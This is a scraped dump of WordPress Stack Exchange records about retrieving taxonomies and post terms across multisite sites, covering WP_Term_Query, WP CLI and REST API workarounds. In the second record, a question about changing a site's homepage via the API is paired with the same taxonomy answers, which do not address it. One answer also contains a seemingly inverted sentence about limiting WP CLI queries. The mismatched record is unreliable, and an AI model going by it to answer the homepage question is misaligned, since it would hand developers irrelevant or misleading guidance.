"text": "<blockquote>\n<p>how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?</p>\n</blockquote>\n<p>You can do this by omitting the taxonomy from <code>WP_Term_Query</code>:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query( [\n 'object_ids' => [ $post_id ]\n] );\n$terms = $query->get_terms();\n</code></pre>\n<p>Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available</p>\n<blockquote>\n<p>How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?</p>\n</blockquote>\n<p><strong>Unfortunately, no, there is no API or function call in PHP that will give you this information.</strong></p>\n<p>Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.</p>\n<p>The root problem is that <code>switch_to_blog</code> changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.</p>\n<h2>Work Arounds</h2>\n<p>However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.</p>\n<ol>\n<li>Retrieving all terms and inspecting their taxonomy field</li>\n<li>WP CLI</li>\n<li>REST API</li>\n<li>Dedicated REST API endpoints</li>\n<li>Pushing Data</li>\n<li>Uniform taxonomies, but with different visibility</li>\n<li>Preparing data in advance</li>\n</ol>\n<p>These are all work arounds that try to cater for the edge case you've asked about.</p>\n<p>Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.</p>\n<h3>Retrieving all Terms</h3>\n<p>We can retrieve all terms in a site, then loop over them to identify the <code>taxonomy</code> fields:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query([]);\n$terms = $query->get_terms();\n$taxonomies = wp_list_pluck( $terms, 'taxonomy' );\n$taxonomies = array_unique( $taxonomies );\n</code></pre>\n<p>However, there are some major problems with this:</p>\n<ul>\n<li>it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion</li>\n<li>it only shows used taxonomies, if there are no categories then the category taxonomy will not show</li>\n<li>this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available</li>\n</ul>\n<h3>WP CLI</h3>\n<p>WP CLI can give you exactly what you need for both of your questions, <em>if it's available</em>. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.</p>\n<ul>\n<li>we call WP CLI via either <code>exec</code> or <code>proc_open</code></li>\n<li>we specify which site we want via the <code>--url</code> parameter, we can get the URL via a standard API call such as <code>get_site_url( $site_id )</code></li>\n<li>We add the <code>--format</code> parameter to ensure WP CLI gives us machine readable results, either <code>--format="csv"</code> for a CSV string that functions such as <code>fgetcsv</code> etc can process, or <code>--format="json"</code> which <code>json_decode</code> can process. JSON will be easier</li>\n<li>we parse the result in PHP</li>\n</ul>\n<p>For example, here is the local copy of my site:</p>\n<pre><code>vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| name | label | description | object_type | show_tagcloud | hierarchical | public |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| category | Categories | | post | 1 | 1 | 1 |\n| post_tag | Tags | | post | 1 | | 1 |\n| nav_menu | Navigation Menus | | nav_menu_item | | | |\n| link_category | Link Categories | | link | 1 | | |\n| post_format | Formats | | post | | | 1 |\n| technology | Technologies | | project | 1 | | 1 |\n| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |\n| series | Series | | post | | | 1 |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n</code></pre>\n<p>I can also pass <code>--format=json</code> or <code>--format=csv</code> to get a machine parseable result.</p>\n<p>I can target individual sites in a multisite install by passing the <code>--url</code> parameter</p>\n<p>e.g.</p>\n<pre><code>wp taxonomy list --url="https://example.com/" --format="json"\n</code></pre>\n<p>I can then call this from PHP and parse the result to get a list of taxonomies.</p>\n<p>The same is true of terms, e.g. listing</p>\n<pre><code>❯ wp term list category\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| term_id | term_taxonomy_id | name | slug | description | parent | count |\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |\n| 245 | 276 | Big WP | big-wp | | 4 | 0 |\n| 95 | 100 | CSS | css | | 7 | 1 |\n| 7 | 7 | Design | design | | 0 | 3 |\n| 30 | 32 | Development | development | | 17 | 31 |\n...\n</code></pre>\n<p>Or a posts categories:</p>\n<pre><code>❯ wp post term list 15 category --format=csv\nterm_id,name,slug,taxonomy\n5,WordCamp,wordcamp,category\n</code></pre>\n<p>Be sure to set the right working path, and the <code>wp</code> is installed available and executable.</p>\n<p>Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.</p>\n<p><em>However, if WP CLI isn't available...</em></p>\n<h3>REST API</h3>\n<p>You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:</p>\n<ul>\n<li>HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired</li>\n<li>Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin</li>\n</ul>\n<p>But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.</p>\n<p>Visit <code>example.com/wp-json/wp/v2/taxonomies</code> and you'll get a JSON list of public taxonomies, each object in the list has a <code>types</code> subfield that lists the post types it applies to.</p>\n<p>You can also fetch a post this way via the <code>/wp/v2/posts</code> endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.</p>\n<h3>Custom Endpoint</h3>\n<p>You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.</p>\n<p>To do this, call <code>register_rest_route</code> to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON</p>\n<h3>Pushing The Data</h3>\n<p>Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.</p>\n<h3>Uniform taxonomies, but with different visibility</h3>\n<p>Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. <em><strong>But nobody said the taxonomies need to have the same options</strong></em></p>\n<p>For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.</p>\n<p>This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins</p>\n<h3>Preparing data in advance</h3>\n<p>We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?</p>\n<p>For example, a site could store an option containing the registered taxonomies and their attributes.</p>\n<p>The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies.</p>\n"
},
{
"answer_id": 375381,
"author": "XedinUnknown",
"author_id": 64825,
"author_profile": "https://wordpress.stackexchange.com/users/64825",
"pm_score": 0,
"selected": false,
"text": "<p>Use <a href=\"https://developer.wordpress.org/reference/classes/WP_Term_Query/__construct/\" rel=\"nofollow noreferrer\"><code>WP_Term_Query</code></a> without the <code>taxonomy</code> parameter. While <a href=\"https://developer.wordpress.org/reference/functions/wp_get_object_terms/\" rel=\"nofollow noreferrer\"><code>wp_get_object_terms()</code></a> strangely doesn't allow omitting the <code>taxonomy</code> parameter, <code>WP_Term_Query</code> that is used under the hood does.</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getPostTerms(int $postId, int $siteId): array\n{\n switch_to_blog($siteId);\n\n $postId = 123;\n $query = new WP_Term_Query(['object_ids' => [$postId]]);\n $terms = $query->get_terms();\n\n restore_current_blog();\n\n /* @var $terms WP_Term[] */\n return $terms;\n}\n</code></pre>\n<p>This returns all terms for post #123. <strong>Caveat</strong>: only terms that are <em>associated</em> with at least one post seem to be returned.</p>\n<p>From here, it should be possible to iterate over the terms, and get their taxonomy, if the goal is to list all taxonomies:</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getAllTaxonomies(int $siteId): array\n{\n switch_to_blog($siteId);\n\n $query = new WP_Term_Query([]);\n $terms = $query->get_terms();\n\n $taxonomies = [];\n foreach ($terms as $term) {\n assert($term instanceof WP_Term);\n $taxonomy = $term->taxonomy;\n $taxonomies[$taxonomy] = true;\n }\n\n restore_current_blog();\n\n $taxonomies = array_keys($taxonomies);\n return $taxonomies;\n}\n\n</code></pre>\n<p>This allows retrieving all taxonomy slugs for a specific site. <strong>Caveat</strong>: it only appears to return taxonomies which have at least 1 post associated with at least 1 term. This is not the most performant way because it would loop through all of the terms, but there aren't usually more than a dozen terms for a taxonomy, so it should be fine in most cases.</p>\n<h2>Limitations</h2>\n<ol>\n<li>Cannot get terms that have no posts associated with them. Consequently, cannot get taxonomy slugs for which there are no terms associated with at least 1 post.</li>\n<li>Cannot retrieve <a href=\"https://developer.wordpress.org/reference/classes/wp_taxonomy/\" rel=\"nofollow noreferrer\"><code>WP_Taxonomy</code></a> objects for an arbitrary site, because taxonomies from plugins that are not running in the current site are not guaranteed to be registered at all.</li>\n</ol>\n"
}
] | 2020/09/22 | [
"https://wordpress.stackexchange.com/questions/375267",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/64825/"
] | Background
----------
I need to retrieve terms for a post in an arbitrary site on a multisite network. This is not necessarily the site that the WP instance is running in at that moment. `wp_get_object_terms()` requires the taxonomy for which to retrieve the terms. So, to retrieve all terms for all taxonomies, it would be necessary to first retrieve the taxonomies. This does not appear to be possible, as the taxonomies that are registered by plugins may not be getting registered on the *current* (original) site that the instance is running in, because the plugins themselves would not be active on that site.
Question
--------
How can I retrieve all taxonomies of an *arbitrary* site *programmatically*?
In other words, given that I have a site `$siteId`, how can I retrieve all taxonomies on that site?
Alternatively, how can I retrieve all taxonomy terms for a post in an *arbitrary* site *programmatically*?
In other words, given post `$post` and site `$siteId`, how can I retrieve all terms for all taxonomies of that post in that site? | >
> how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?
>
>
>
You can do this by omitting the taxonomy from `WP_Term_Query`:
```php
$query = new WP_Term_Query( [
'object_ids' => [ $post_id ]
] );
$terms = $query->get_terms();
```
Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available
>
> How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?
>
>
>
**Unfortunately, no, there is no API or function call in PHP that will give you this information.**
Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.
The root problem is that `switch_to_blog` changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.
Work Arounds
------------
However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.
1. Retrieving all terms and inspecting their taxonomy field
2. WP CLI
3. REST API
4. Dedicated REST API endpoints
5. Pushing Data
6. Uniform taxonomies, but with different visibility
7. Preparing data in advance
These are all work arounds that try to cater for the edge case you've asked about.
Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.
### Retrieving all Terms
We can retrieve all terms in a site, then loop over them to identify the `taxonomy` fields:
```php
$query = new WP_Term_Query([]);
$terms = $query->get_terms();
$taxonomies = wp_list_pluck( $terms, 'taxonomy' );
$taxonomies = array_unique( $taxonomies );
```
However, there are some major problems with this:
* it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion
* it only shows used taxonomies, if there are no categories then the category taxonomy will not show
* this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available
### WP CLI
WP CLI can give you exactly what you need for both of your questions, *if it's available*. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.
* we call WP CLI via either `exec` or `proc_open`
* we specify which site we want via the `--url` parameter, we can get the URL via a standard API call such as `get_site_url( $site_id )`
* We add the `--format` parameter to ensure WP CLI gives us machine readable results, either `--format="csv"` for a CSV string that functions such as `fgetcsv` etc can process, or `--format="json"` which `json_decode` can process. JSON will be easier
* we parse the result in PHP
For example, here is the local copy of my site:
```
vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| name | label | description | object_type | show_tagcloud | hierarchical | public |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| category | Categories | | post | 1 | 1 | 1 |
| post_tag | Tags | | post | 1 | | 1 |
| nav_menu | Navigation Menus | | nav_menu_item | | | |
| link_category | Link Categories | | link | 1 | | |
| post_format | Formats | | post | | | 1 |
| technology | Technologies | | project | 1 | | 1 |
| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |
| series | Series | | post | | | 1 |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
```
I can also pass `--format=json` or `--format=csv` to get a machine parseable result.
I can target individual sites in a multisite install by passing the `--url` parameter
e.g.
```
wp taxonomy list --url="https://example.com/" --format="json"
```
I can then call this from PHP and parse the result to get a list of taxonomies.
The same is true of terms, e.g. listing
```
❯ wp term list category
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| term_id | term_taxonomy_id | name | slug | description | parent | count |
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |
| 245 | 276 | Big WP | big-wp | | 4 | 0 |
| 95 | 100 | CSS | css | | 7 | 1 |
| 7 | 7 | Design | design | | 0 | 3 |
| 30 | 32 | Development | development | | 17 | 31 |
...
```
Or a posts categories:
```
❯ wp post term list 15 category --format=csv
term_id,name,slug,taxonomy
5,WordCamp,wordcamp,category
```
Be sure to set the right working path, and the `wp` is installed available and executable.
Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.
*However, if WP CLI isn't available...*
### REST API
You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:
* HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired
* Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin
But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.
Visit `example.com/wp-json/wp/v2/taxonomies` and you'll get a JSON list of public taxonomies, each object in the list has a `types` subfield that lists the post types it applies to.
You can also fetch a post this way via the `/wp/v2/posts` endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.
### Custom Endpoint
You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.
To do this, call `register_rest_route` to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON
### Pushing The Data
Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.
### Uniform taxonomies, but with different visibility
Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. ***But nobody said the taxonomies need to have the same options***
For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.
This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins
### Preparing data in advance
We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?
For example, a site could store an option containing the registered taxonomies and their attributes.
The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies. |
375,287 | <p>Is there any way to change a site's homepage (Settings -> Reading), via API? We're running a React app with a Headless WP 'backend', and I'd like to let users change the homepage of their sites though our app.</p>
<p>I searched but couldn't find a solution to this.</p>
<p>Thanks</p>
| [
{
"answer_id": 375278,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 2,
"selected": false,
"text": "<blockquote>\n<p>how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?</p>\n</blockquote>\n<p>You can do this by omitting the taxonomy from <code>WP_Term_Query</code>:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query( [\n 'object_ids' => [ $post_id ]\n] );\n$terms = $query->get_terms();\n</code></pre>\n<p>Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available</p>\n<blockquote>\n<p>How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?</p>\n</blockquote>\n<p><strong>Unfortunately, no, there is no API or function call in PHP that will give you this information.</strong></p>\n<p>Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.</p>\n<p>The root problem is that <code>switch_to_blog</code> changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.</p>\n<h2>Work Arounds</h2>\n<p>However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.</p>\n<ol>\n<li>Retrieving all terms and inspecting their taxonomy field</li>\n<li>WP CLI</li>\n<li>REST API</li>\n<li>Dedicated REST API endpoints</li>\n<li>Pushing Data</li>\n<li>Uniform taxonomies, but with different visibility</li>\n<li>Preparing data in advance</li>\n</ol>\n<p>These are all work arounds that try to cater for the edge case you've asked about.</p>\n<p>Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.</p>\n<h3>Retrieving all Terms</h3>\n<p>We can retrieve all terms in a site, then loop over them to identify the <code>taxonomy</code> fields:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query([]);\n$terms = $query->get_terms();\n$taxonomies = wp_list_pluck( $terms, 'taxonomy' );\n$taxonomies = array_unique( $taxonomies );\n</code></pre>\n<p>However, there are some major problems with this:</p>\n<ul>\n<li>it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion</li>\n<li>it only shows used taxonomies, if there are no categories then the category taxonomy will not show</li>\n<li>this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available</li>\n</ul>\n<h3>WP CLI</h3>\n<p>WP CLI can give you exactly what you need for both of your questions, <em>if it's available</em>. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.</p>\n<ul>\n<li>we call WP CLI via either <code>exec</code> or <code>proc_open</code></li>\n<li>we specify which site we want via the <code>--url</code> parameter, we can get the URL via a standard API call such as <code>get_site_url( $site_id )</code></li>\n<li>We add the <code>--format</code> parameter to ensure WP CLI gives us machine readable results, either <code>--format="csv"</code> for a CSV string that functions such as <code>fgetcsv</code> etc can process, or <code>--format="json"</code> which <code>json_decode</code> can process. JSON will be easier</li>\n<li>we parse the result in PHP</li>\n</ul>\n<p>For example, here is the local copy of my site:</p>\n<pre><code>vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| name | label | description | object_type | show_tagcloud | hierarchical | public |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| category | Categories | | post | 1 | 1 | 1 |\n| post_tag | Tags | | post | 1 | | 1 |\n| nav_menu | Navigation Menus | | nav_menu_item | | | |\n| link_category | Link Categories | | link | 1 | | |\n| post_format | Formats | | post | | | 1 |\n| technology | Technologies | | project | 1 | | 1 |\n| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |\n| series | Series | | post | | | 1 |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n</code></pre>\n<p>I can also pass <code>--format=json</code> or <code>--format=csv</code> to get a machine parseable result.</p>\n<p>I can target individual sites in a multisite install by passing the <code>--url</code> parameter</p>\n<p>e.g.</p>\n<pre><code>wp taxonomy list --url="https://example.com/" --format="json"\n</code></pre>\n<p>I can then call this from PHP and parse the result to get a list of taxonomies.</p>\n<p>The same is true of terms, e.g. listing</p>\n<pre><code>❯ wp term list category\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| term_id | term_taxonomy_id | name | slug | description | parent | count |\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |\n| 245 | 276 | Big WP | big-wp | | 4 | 0 |\n| 95 | 100 | CSS | css | | 7 | 1 |\n| 7 | 7 | Design | design | | 0 | 3 |\n| 30 | 32 | Development | development | | 17 | 31 |\n...\n</code></pre>\n<p>Or a posts categories:</p>\n<pre><code>❯ wp post term list 15 category --format=csv\nterm_id,name,slug,taxonomy\n5,WordCamp,wordcamp,category\n</code></pre>\n<p>Be sure to set the right working path, and the <code>wp</code> is installed available and executable.</p>\n<p>Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.</p>\n<p><em>However, if WP CLI isn't available...</em></p>\n<h3>REST API</h3>\n<p>You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:</p>\n<ul>\n<li>HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired</li>\n<li>Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin</li>\n</ul>\n<p>But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.</p>\n<p>Visit <code>example.com/wp-json/wp/v2/taxonomies</code> and you'll get a JSON list of public taxonomies, each object in the list has a <code>types</code> subfield that lists the post types it applies to.</p>\n<p>You can also fetch a post this way via the <code>/wp/v2/posts</code> endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.</p>\n<h3>Custom Endpoint</h3>\n<p>You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.</p>\n<p>To do this, call <code>register_rest_route</code> to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON</p>\n<h3>Pushing The Data</h3>\n<p>Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.</p>\n<h3>Uniform taxonomies, but with different visibility</h3>\n<p>Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. <em><strong>But nobody said the taxonomies need to have the same options</strong></em></p>\n<p>For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.</p>\n<p>This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins</p>\n<h3>Preparing data in advance</h3>\n<p>We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?</p>\n<p>For example, a site could store an option containing the registered taxonomies and their attributes.</p>\n<p>The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies.</p>\n"
},
{
"answer_id": 375381,
"author": "XedinUnknown",
"author_id": 64825,
"author_profile": "https://wordpress.stackexchange.com/users/64825",
"pm_score": 0,
"selected": false,
"text": "<p>Use <a href=\"https://developer.wordpress.org/reference/classes/WP_Term_Query/__construct/\" rel=\"nofollow noreferrer\"><code>WP_Term_Query</code></a> without the <code>taxonomy</code> parameter. While <a href=\"https://developer.wordpress.org/reference/functions/wp_get_object_terms/\" rel=\"nofollow noreferrer\"><code>wp_get_object_terms()</code></a> strangely doesn't allow omitting the <code>taxonomy</code> parameter, <code>WP_Term_Query</code> that is used under the hood does.</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getPostTerms(int $postId, int $siteId): array\n{\n switch_to_blog($siteId);\n\n $postId = 123;\n $query = new WP_Term_Query(['object_ids' => [$postId]]);\n $terms = $query->get_terms();\n\n restore_current_blog();\n\n /* @var $terms WP_Term[] */\n return $terms;\n}\n</code></pre>\n<p>This returns all terms for post #123. <strong>Caveat</strong>: only terms that are <em>associated</em> with at least one post seem to be returned.</p>\n<p>From here, it should be possible to iterate over the terms, and get their taxonomy, if the goal is to list all taxonomies:</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getAllTaxonomies(int $siteId): array\n{\n switch_to_blog($siteId);\n\n $query = new WP_Term_Query([]);\n $terms = $query->get_terms();\n\n $taxonomies = [];\n foreach ($terms as $term) {\n assert($term instanceof WP_Term);\n $taxonomy = $term->taxonomy;\n $taxonomies[$taxonomy] = true;\n }\n\n restore_current_blog();\n\n $taxonomies = array_keys($taxonomies);\n return $taxonomies;\n}\n\n</code></pre>\n<p>This allows retrieving all taxonomy slugs for a specific site. <strong>Caveat</strong>: it only appears to return taxonomies which have at least 1 post associated with at least 1 term. This is not the most performant way because it would loop through all of the terms, but there aren't usually more than a dozen terms for a taxonomy, so it should be fine in most cases.</p>\n<h2>Limitations</h2>\n<ol>\n<li>Cannot get terms that have no posts associated with them. Consequently, cannot get taxonomy slugs for which there are no terms associated with at least 1 post.</li>\n<li>Cannot retrieve <a href=\"https://developer.wordpress.org/reference/classes/wp_taxonomy/\" rel=\"nofollow noreferrer\"><code>WP_Taxonomy</code></a> objects for an arbitrary site, because taxonomies from plugins that are not running in the current site are not guaranteed to be registered at all.</li>\n</ol>\n"
}
] | 2020/09/22 | [
"https://wordpress.stackexchange.com/questions/375287",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/185432/"
] | Is there any way to change a site's homepage (Settings -> Reading), via API? We're running a React app with a Headless WP 'backend', and I'd like to let users change the homepage of their sites though our app.
I searched but couldn't find a solution to this.
Thanks | >
> how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?
>
>
>
You can do this by omitting the taxonomy from `WP_Term_Query`:
```php
$query = new WP_Term_Query( [
'object_ids' => [ $post_id ]
] );
$terms = $query->get_terms();
```
Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available
>
> How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?
>
>
>
**Unfortunately, no, there is no API or function call in PHP that will give you this information.**
Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.
The root problem is that `switch_to_blog` changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.
Work Arounds
------------
However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.
1. Retrieving all terms and inspecting their taxonomy field
2. WP CLI
3. REST API
4. Dedicated REST API endpoints
5. Pushing Data
6. Uniform taxonomies, but with different visibility
7. Preparing data in advance
These are all work arounds that try to cater for the edge case you've asked about.
Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.
### Retrieving all Terms
We can retrieve all terms in a site, then loop over them to identify the `taxonomy` fields:
```php
$query = new WP_Term_Query([]);
$terms = $query->get_terms();
$taxonomies = wp_list_pluck( $terms, 'taxonomy' );
$taxonomies = array_unique( $taxonomies );
```
However, there are some major problems with this:
* it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion
* it only shows used taxonomies, if there are no categories then the category taxonomy will not show
* this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available
### WP CLI
WP CLI can give you exactly what you need for both of your questions, *if it's available*. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.
* we call WP CLI via either `exec` or `proc_open`
* we specify which site we want via the `--url` parameter, we can get the URL via a standard API call such as `get_site_url( $site_id )`
* We add the `--format` parameter to ensure WP CLI gives us machine readable results, either `--format="csv"` for a CSV string that functions such as `fgetcsv` etc can process, or `--format="json"` which `json_decode` can process. JSON will be easier
* we parse the result in PHP
For example, here is the local copy of my site:
```
vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| name | label | description | object_type | show_tagcloud | hierarchical | public |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| category | Categories | | post | 1 | 1 | 1 |
| post_tag | Tags | | post | 1 | | 1 |
| nav_menu | Navigation Menus | | nav_menu_item | | | |
| link_category | Link Categories | | link | 1 | | |
| post_format | Formats | | post | | | 1 |
| technology | Technologies | | project | 1 | | 1 |
| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |
